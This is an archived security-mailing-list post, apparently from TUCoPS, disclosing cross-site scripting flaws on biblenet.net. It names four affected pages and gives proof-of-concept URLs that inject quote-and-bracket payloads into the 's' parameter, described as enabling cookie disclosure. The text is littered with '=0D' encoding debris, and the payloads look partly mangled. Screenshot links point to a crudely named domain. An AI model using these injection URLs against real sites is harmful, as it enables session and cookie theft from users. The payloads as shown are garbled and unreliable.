Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: b06-3125.htm

Biblenet.net - XSS



Biblenet.net - XSS
Biblenet.net - XSS



Biblenet.net=0D
=0D
Homepage:=0D
http://www.biblenet.net=0D 
=0D
Affected files:=0D
gettinginvolved.html=0D
register.php=0D
member.php=0D
/library/index.html=0D
-----------------------------------------=0D
=0D
Biblespace uses vBulletin for most of their site, so most of these vulns are based in the vbulletin site themselves, which others have probably found before.=0D
=0D
XSS vuln with cookie disclosure via gettingInvolved.html:=0D
=0D
">">">">"><"<"<"<"=0D">http://www.biblenet.net/gettingInvolved.html?s=">">">">">"><"<"<"<"=0D 
=0D
XSS vuln with cookie disclosure via register.php:=0D
">">">">"><"<"<"<"&action=signup=0D">http://www.biblenet.net/forums/register.php?s=\\">">">">">"><"<"<"<"&action=signup=0D 
=0D
=0D
XSS vuln with cookie disclosure via member.php when editing profile, this time after we've logged in:=0D
=0D
">">">'>'>'><"<"<"<'<'=0D">http://www.biblenet.net/forums/member.php?action=editprofile&s=">">">">'>'>'><"<"<"<'<'=0D 
=0D
Same XSS vuln above, this time on /library/index.html:=0D
">">">">"><"<"<"<"=0D">http://www.biblenet.net/library/index.html?s=questions">">">">">"><"<"<"<"=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/biblespace1.jpg=0D 
http://www.youfucktard.com/xsp/biblespace2.jpg=0D 
http://www.youfucktard.com/xsp/biblespace3.jpg 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH